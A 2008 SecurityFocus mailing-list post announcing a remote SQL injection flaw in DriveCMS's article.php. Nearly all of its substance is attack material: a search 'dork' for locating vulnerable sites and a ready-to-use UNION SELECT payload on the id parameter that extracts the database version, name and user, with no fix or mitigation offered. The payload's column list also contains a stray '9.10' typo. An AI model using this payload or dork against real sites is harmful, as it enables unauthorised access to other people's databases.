SecurityFocus

DriveCMS article.php remote sql injection Nov 02 2008 09:11AM
beenudel1986 gmail com

################################################################

#

# Author: Beenu Arora

#

# Home : www.BeenuArora.com

#

# Email : beenudel1986 (at) gmail (dot) com [email concealed]

#

# Share the c0de!

#

################################################################

#

# Title: DriveCMS Article.php Sql Injection

#

# Vendor: http://drivecms.com

#

#

###########################################################

#

# d0rk:Powered by DriveCMS

#

###########################################################

Live Demo:

payload: /article.php?id=-1+union+select+1,concat(version(),0x3a,database(),0x3a,
user()),3,4,5,6,7,8,9.10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33--

Column number can be diffrent too

###########################################################

#

# Bug discovered : 02 Nov.2008

###########################################################

[ reply ]